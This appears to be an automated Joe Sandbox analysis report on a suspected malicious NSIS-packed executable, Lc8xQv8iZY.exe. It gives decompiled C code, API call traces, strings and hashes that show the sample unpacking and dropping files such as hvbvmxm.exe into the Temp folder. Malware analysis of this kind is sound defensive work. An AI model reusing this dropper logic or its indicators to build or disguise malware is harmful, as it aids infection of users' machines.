                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Lc8xQv8iZY.exe,C:\Users\user\Desktop\Lc8xQv8iZY.exe,80000000,00000003), ref: 00402D01
                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E48
                                                  Strings
                                                  • C:\Users\user\Desktop, xrefs: 00402CE3, 00402CE8, 00402CEE
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EDF
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C95, 00402E60
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E91
                                                  • Null, xrefs: 00402D81
                                                  • C:\Users\user\Desktop\Lc8xQv8iZY.exe, xrefs: 00402CA2, 00402CB1, 00402CC5, 00402CE2
                                                  • "C:\Users\user\Desktop\Lc8xQv8iZY.exe", xrefs: 00402C88
                                                  • Inst, xrefs: 00402D6F
                                                  • Error launching installer, xrefs: 00402CD8
                                                  • soft, xrefs: 00402D78
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\Lc8xQv8iZY.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Lc8xQv8iZY.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 2803837635-3043249375
                                                  • Opcode ID: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
                                                  • Instruction ID: 0e9652230e662f00d3bd1f21a88cc9cb10148a41a7cca4fb595923dc4d2ca5a0
                                                  • Opcode Fuzzy Hash: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
                                                  • Instruction Fuzzy Hash: 2461C231A40205ABDB20DF64DE89B9E77B9EB04319F20417BF604B62D1D7BC9D818B9C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 75%
                                                  			E00401734(FILETIME* __ebx, void* __eflags) {
                                                  				void* _t33;
                                                  				void* _t41;
                                                  				void* _t43;
                                                  				FILETIME* _t49;
                                                  				FILETIME* _t62;
                                                  				void* _t64;
                                                  				signed int _t70;
                                                  				FILETIME* _t71;
                                                  				FILETIME* _t75;
                                                  				signed int _t77;
                                                  				void* _t80;
                                                  				CHAR* _t82;
                                                  				void* _t85;
                                                  
                                                  				_t75 = __ebx;
                                                  				_t82 = E00402A0C(0x31);
                                                  				 *(_t85 - 0xc) = _t82;
                                                  				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                  				_t33 = E0040585B(_t82);
                                                  				_push(_t82);
                                                  				if(_t33 == 0) {
                                                  					lstrcatA(E004057EE(E00405CFB(0x409c50, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                                  				} else {
                                                  					_push(0x409c50);
                                                  					E00405CFB();
                                                  				}
                                                  				E00405F5D(0x409c50);
                                                  				while(1) {
                                                  					__eflags =  *(_t85 + 8) - 3;
                                                  					if( *(_t85 + 8) >= 3) {
                                                  						_t64 = E00405FF6(0x409c50);
                                                  						_t77 = 0;
                                                  						__eflags = _t64 - _t75;
                                                  						if(_t64 != _t75) {
                                                  							_t71 = _t64 + 0x14;
                                                  							__eflags = _t71;
                                                  							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                  						}
                                                  						asm("sbb eax, eax");
                                                  						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                  						__eflags = _t70;
                                                  						 *(_t85 + 8) = _t70;
                                                  					}
                                                  					__eflags =  *(_t85 + 8) - _t75;
                                                  					if( *(_t85 + 8) == _t75) {
                                                  						E004059B3(0x409c50);
                                                  					}
                                                  					__eflags =  *(_t85 + 8) - 1;
                                                  					_t41 = E004059D2(0x409c50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                  					__eflags = _t41 - 0xffffffff;
                                                  					 *(_t85 - 8) = _t41;
                                                  					if(_t41 != 0xffffffff) {
                                                  						break;
                                                  					}
                                                  					__eflags =  *(_t85 + 8) - _t75;
                                                  					if( *(_t85 + 8) != _t75) {
                                                  						E00404FE7(0xffffffe2,  *(_t85 - 0xc));
                                                  						__eflags =  *(_t85 + 8) - 2;
                                                  						if(__eflags == 0) {
                                                  							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                  						}
                                                  						L31:
                                                  						 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t85 - 4));
                                                  						__eflags =  *0x424008;
                                                  						goto L32;
                                                  					} else {
                                                  						E00405CFB(0x40a450, 0x425000);
                                                  						E00405CFB(0x425000, 0x409c50);
                                                  						E00405D1D(_t75, 0x40a450, 0x409c50, 0x40a050,  *((intOrPtr*)(_t85 - 0x14)));
                                                  						E00405CFB(0x425000, 0x40a450);
                                                  						_t62 = E004055BC(0x40a050,  *(_t85 - 0x28) >> 3) - 4;
                                                  						__eflags = _t62;
                                                  						if(_t62 == 0) {
                                                  							continue;
                                                  						} else {
                                                  							__eflags = _t62 == 1;
                                                  							if(_t62 == 1) {
                                                  								 *0x424008 =  &( *0x424008->dwLowDateTime);
                                                  								L32:
                                                  								_t49 = 0;
                                                  								__eflags = 0;
                                                  							} else {
                                                  								_push(0x409c50);
                                                  								_push(0xfffffffa);
                                                  								E00404FE7();
                                                  								L29:
                                                  								_t49 = 0x7fffffff;
                                                  							}
                                                  						}
                                                  					}
                                                  					L33:
                                                  					return _t49;
                                                  				}
                                                  				E00404FE7(0xffffffea,  *(_t85 - 0xc));
                                                  				 *0x424034 =  *0x424034 + 1;
                                                  				_t43 = E00402F2E(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
                                                  				 *0x424034 =  *0x424034 - 1;
                                                  				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                  				_t80 = _t43;
                                                  				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                  					L22:
                                                  					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                  				} else {
                                                  					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                  					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                  						goto L22;
                                                  					}
                                                  				}
                                                  				FindCloseChangeNotification( *(_t85 - 8)); // executed
                                                  				__eflags = _t80 - _t75;
                                                  				if(_t80 >= _t75) {
                                                  					goto L31;
                                                  				} else {
                                                  					__eflags = _t80 - 0xfffffffe;
                                                  					if(_t80 != 0xfffffffe) {
                                                  						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffee);
                                                  					} else {
                                                  						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffe9);
                                                  						lstrcatA(0x409c50,  *(_t85 - 0xc));
                                                  					}
                                                  					_push(0x200010);
                                                  					_push(0x409c50);
                                                  					E004055BC();
                                                  					goto L29;
                                                  				}
                                                  				goto L33;
                                                  			}

















                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                  • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h,"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h,00000000,00000000,"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                    • Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                    • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                    • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h$C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 1941528284-1310186067
                                                  • Opcode ID: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
                                                  • Instruction ID: 259d77b7a90db29c7fa011e8bbfdec82aa2f97c3204575e8132969168071ea88
                                                  • Opcode Fuzzy Hash: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
                                                  • Instruction Fuzzy Hash: E041C332904519BADF107BA5CD45EAF3669EF41328B20823BF522F11E1D73C4A419F6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 415 402f2e-402f3d 416 402f5b-402f66 call 403059 415->416 417 402f3f-402f55 SetFilePointer 415->417 420 403052-403056 416->420 421 402f6c-402f86 ReadFile 416->421 417->416 422 402f8c-402f8f 421->422 423 40304f 421->423 422->423 424 402f95-402fa8 call 403059 422->424 425 403051 423->425 424->420 428 402fae-402fb1 424->428 425->420 429 402fb3-402fb6 428->429 430 40301e-403024 428->430 433 40304a-40304d 429->433 434 402fbc 429->434 431 403026 430->431 432 403029-40303c ReadFile 430->432 431->432 432->423 435 40303e-403047 432->435 433->420 436 402fc1-402fc9 434->436 435->433 437 402fcb 436->437 438 402fce-402fe0 ReadFile 436->438 437->438 438->423 439 402fe2-402fe5 438->439 439->423 440 402fe7-402ffc WriteFile 439->440 441 40301a-40301c 440->441 442 402ffe-403001 440->442 441->425 442->441 443 403003-403016 442->443 443->436 444 403018 443->444 444->433
                                                  C-Code - Quality: 93%
                                                  			E00402F2E(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                                                  				long _v8;
                                                  				intOrPtr _v12;
                                                  				void _t31;
                                                  				intOrPtr _t32;
                                                  				int _t35;
                                                  				long _t36;
                                                  				int _t37;
                                                  				long _t38;
                                                  				int _t40;
                                                  				int _t42;
                                                  				long _t43;
                                                  				long _t44;
                                                  				long _t55;
                                                  				long _t57;
                                                  
                                                  				_t31 = _a4;
                                                  				if(_t31 >= 0) {
                                                  					_t44 = _t31 +  *0x423fd8;
                                                  					 *0x417124 = _t44;
                                                  					SetFilePointer( *0x409018, _t44, 0, 0); // executed
                                                  				}
                                                  				_t57 = 4;
                                                  				_t32 = E00403059(_t57);
                                                  				if(_t32 >= 0) {
                                                  					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
                                                  					if(_t35 == 0 || _v8 != _t57) {
                                                  						L23:
                                                  						_push(0xfffffffd);
                                                  						goto L24;
                                                  					} else {
                                                  						 *0x417124 =  *0x417124 + _t57;
                                                  						_t32 = E00403059(_a4);
                                                  						_v12 = _t32;
                                                  						if(_t32 >= 0) {
                                                  							if(_a12 != 0) {
                                                  								_t36 = _a4;
                                                  								if(_t36 >= _a16) {
                                                  									_t36 = _a16;
                                                  								}
                                                  								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
                                                  								if(_t37 == 0) {
                                                  									goto L23;
                                                  								} else {
                                                  									_t38 = _v8;
                                                  									 *0x417124 =  *0x417124 + _t38;
                                                  									_v12 = _t38;
                                                  									goto L22;
                                                  								}
                                                  							} else {
                                                  								if(_a4 <= 0) {
                                                  									L22:
                                                  									_t32 = _v12;
                                                  								} else {
                                                  									while(1) {
                                                  										_t55 = 0x4000;
                                                  										if(_a4 < 0x4000) {
                                                  											_t55 = _a4;
                                                  										}
                                                  										_t40 = ReadFile( *0x409018, 0x413120, _t55,  &_v8, 0); // executed
                                                  										if(_t40 == 0 || _t55 != _v8) {
                                                  											goto L23;
                                                  										}
                                                  										_t42 = WriteFile(_a8, 0x413120, _v8,  &_a16, 0); // executed
                                                  										if(_t42 == 0 || _a16 != _t55) {
                                                  											_push(0xfffffffe);
                                                  											L24:
                                                  											_pop(_t32);
                                                  										} else {
                                                  											_t43 = _v8;
                                                  											_v12 = _v12 + _t43;
                                                  											_a4 = _a4 - _t43;
                                                  											 *0x417124 =  *0x417124 + _t43;
                                                  											if(_a4 > 0) {
                                                  												continue;
                                                  											} else {
                                                  												goto L22;
                                                  											}
                                                  										}
                                                  										goto L25;
                                                  									}
                                                  									goto L23;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				L25:
                                                  				return _t32;
                                                  			}


















                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402F55
                                                  • ReadFile.KERNELBASE(?,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?), ref: 00402F82
                                                  • ReadFile.KERNELBASE(00413120,00004000,?,00000000,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FDC
                                                  • WriteFile.KERNELBASE(00000000,00413120,?,000000FF,00000000,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FF4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: File$Read$PointerWrite
                                                  • String ID: 1A
                                                  • API String ID: 2113905535-9103686
                                                  • Opcode ID: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
                                                  • Instruction ID: 82d5fff184c734a1787b3ae727349c02325da9e894cdbedb842e9025a389ee8f
                                                  • Opcode Fuzzy Hash: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
                                                  • Instruction Fuzzy Hash: 9A313871501209FBCF21DF55DD44AAF3BB8EB44765F20403AF904A6291D3389F91DBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 445 403059-403082 GetTickCount 446 4031c3-4031cb call 402be9 445->446 447 403088-4030b3 call 403207 SetFilePointer 445->447 452 4031cd-4031d2 446->452 453 4030b8-4030ca 447->453 454 4030cc 453->454 455 4030ce-4030dc call 4031d5 453->455 454->455 458 4030e2-4030ee 455->458 459 4031b5-4031b8 455->459 460 4030f4-4030fa 458->460 459->452 461 403125-403141 call 406184 460->461 462 4030fc-403102 460->462 468 403143-40314b 461->468 469 4031be 461->469 462->461 463 403104-403124 call 402be9 462->463 463->461 471 40314d-403163 WriteFile 468->471 472 40317f-403185 468->472 470 4031c0-4031c1 469->470 470->452 473 403165-403169 471->473 474 4031ba-4031bc 471->474 472->469 475 403187-403189 472->475 473->474 476 40316b-403177 473->476 474->470 475->469 477 40318b-40319e 475->477 476->460 478 40317d 476->478 477->453 479 4031a4-4031b3 SetFilePointer 477->479 478->477 479->446
                                                  C-Code - Quality: 94%
                                                  			E00403059(intOrPtr _a4) {
                                                  				long _v4;
                                                  				void* __ecx;
                                                  				intOrPtr _t12;
                                                  				intOrPtr _t13;
                                                  				signed int _t14;
                                                  				void* _t16;
                                                  				void* _t17;
                                                  				long _t18;
                                                  				int _t21;
                                                  				intOrPtr _t34;
                                                  				long _t35;
                                                  				intOrPtr _t37;
                                                  				void* _t39;
                                                  				long _t40;
                                                  				intOrPtr _t53;
                                                  
                                                  				_t35 =  *0x417124; // 0x505a9
                                                  				_t37 = _t35 -  *0x40b090 + _a4;
                                                  				 *0x423f8c = GetTickCount() + 0x1f4;
                                                  				if(_t37 <= 0) {
                                                  					L23:
                                                  					E00402BE9(1);
                                                  					return 0;
                                                  				}
                                                  				E00403207( *0x41f134);
                                                  				SetFilePointer( *0x409018,  *0x40b090, 0, 0); // executed
                                                  				 *0x41f130 = _t37;
                                                  				 *0x417120 = 0;
                                                  				while(1) {
                                                  					_t12 =  *0x417128; // 0x44117
                                                  					_t34 = 0x4000;
                                                  					_t13 = _t12 -  *0x41f134;
                                                  					if(_t13 <= 0x4000) {
                                                  						_t34 = _t13;
                                                  					}
                                                  					_t14 = E004031D5(0x413120, _t34); // executed
                                                  					if(_t14 == 0) {
                                                  						break;
                                                  					}
                                                  					 *0x41f134 =  *0x41f134 + _t34;
                                                  					 *0x40b0b0 = 0x413120;
                                                  					 *0x40b0b4 = _t34;
                                                  					L6:
                                                  					L6:
                                                  					if( *0x423f90 != 0 &&  *0x424020 == 0) {
                                                  						 *0x417120 =  *0x41f130 -  *0x417124 - _a4 +  *0x40b090;
                                                  						E00402BE9(0);
                                                  					}
                                                  					 *0x40b0b8 = 0x40b120;
                                                  					 *0x40b0bc = 0x8000; // executed
                                                  					_t16 = E00406184(0x40b098); // executed
                                                  					if(_t16 < 0) {
                                                  						goto L21;
                                                  					}
                                                  					_t39 =  *0x40b0b8; // 0x40dbb3
                                                  					_t40 = _t39 - 0x40b120;
                                                  					if(_t40 == 0) {
                                                  						__eflags =  *0x40b0b4; // 0x0
                                                  						if(__eflags != 0) {
                                                  							goto L21;
                                                  						}
                                                  						__eflags = _t34;
                                                  						if(_t34 == 0) {
                                                  							goto L21;
                                                  						}
                                                  						L17:
                                                  						_t18 =  *0x417124; // 0x505a9
                                                  						if(_t18 -  *0x40b090 + _a4 > 0) {
                                                  							continue;
                                                  						}
                                                  						SetFilePointer( *0x409018, _t18, 0, 0); // executed
                                                  						goto L23;
                                                  					}
                                                  					_t21 = WriteFile( *0x409018, 0x40b120, _t40,  &_v4, 0); // executed
                                                  					if(_t21 == 0 || _t40 != _v4) {
                                                  						_push(0xfffffffe);
                                                  						L22:
                                                  						_pop(_t17);
                                                  						return _t17;
                                                  					} else {
                                                  						 *0x40b090 =  *0x40b090 + _t40;
                                                  						_t53 =  *0x40b0b4; // 0x0
                                                  						if(_t53 != 0) {
                                                  							goto L6;
                                                  						}
                                                  						goto L17;
                                                  					}
                                                  					L21:
                                                  					_push(0xfffffffd);
                                                  					goto L22;
                                                  				}
                                                  				return _t14 | 0xffffffff;
                                                  			}



















                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040306E
                                                    • Part of subcall function 00403207: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000), ref: 004030A1
                                                  • WriteFile.KERNELBASE(0040B120,0040DBB3,00000000,00000000,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 0040315B
                                                  • SetFilePointer.KERNELBASE(000505A9,00000000,00000000,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 004031AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$CountTickWrite
                                                  • String ID: 1A
                                                  • API String ID: 2146148272-9103686
                                                  • Opcode ID: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
                                                  • Instruction ID: 4dd4975a9f59093c3e0d8581b597c69eeb1c8b76cfa1fe2ad7fe21498de3e5f3
                                                  • Opcode Fuzzy Hash: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
                                                  • Instruction Fuzzy Hash: 16418D72518201AFC7109F29EE849673BBDF708356714423BEA60B62E0D7386D098B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 480 4015b3-4015c6 call 402a0c call 405882 485 4015c8-4015e3 call 405819 CreateDirectoryA 480->485 486 40160a-40160d 480->486 493 401600-401608 485->493 494 4015e5-4015f0 GetLastError 485->494 488 40162d-40217f call 401423 486->488 489 40160f-401628 call 401423 call 405cfb SetCurrentDirectoryA 486->489 501 4028a1-4028b0 488->501 489->501 493->485 493->486 497 4015f2-4015fb GetFileAttributesA 494->497 498 4015fd 494->498 497->493 497->498 498->493
                                                  C-Code - Quality: 85%
                                                  			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                                  				struct _SECURITY_ATTRIBUTES** _t10;
                                                  				int _t19;
                                                  				struct _SECURITY_ATTRIBUTES* _t20;
                                                  				signed char _t22;
                                                  				struct _SECURITY_ATTRIBUTES* _t23;
                                                  				CHAR* _t25;
                                                  				struct _SECURITY_ATTRIBUTES** _t29;
                                                  				void* _t30;
                                                  
                                                  				_t23 = __ebx;
                                                  				_t25 = E00402A0C(0xfffffff0);
                                                  				_t10 = E00405882(_t25);
                                                  				_t27 = _t10;
                                                  				if(_t10 != __ebx) {
                                                  					do {
                                                  						_t29 = E00405819(_t27, 0x5c);
                                                  						 *_t29 = _t23;
                                                  						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                  						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                  						if(_t19 == 0) {
                                                  							if(GetLastError() != 0xb7) {
                                                  								L4:
                                                  								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                  							} else {
                                                  								_t22 = GetFileAttributesA(_t25); // executed
                                                  								if((_t22 & 0x00000010) == 0) {
                                                  									goto L4;
                                                  								}
                                                  							}
                                                  						}
                                                  						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                  						 *_t29 = _t20;
                                                  						_t27 =  &(_t29[0]);
                                                  					} while (_t20 != _t23);
                                                  				}
                                                  				if( *((intOrPtr*)(_t30 - 0x24)) == _t23) {
                                                  					_push(0xfffffff5);
                                                  					E00401423();
                                                  				} else {
                                                  					E00401423(0xffffffe6);
                                                  					E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
                                                  					SetCurrentDirectoryA(_t25); // executed
                                                  				}
                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t30 - 4));
                                                  				return 0;
                                                  			}












                                                  APIs
                                                    • Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405890
                                                    • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
                                                    • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4
                                                  • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 3751793516-47812868
                                                  • Opcode ID: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
                                                  • Instruction ID: d0a9f9296d723caddbd0f60560613e174b6a475f07d6f089b0aabedb845a292b
                                                  • Opcode Fuzzy Hash: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
                                                  • Instruction Fuzzy Hash: CE010832908140AFD7217B755D4497F37B4DE91369724463FF891B22E1C63C0D42962E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
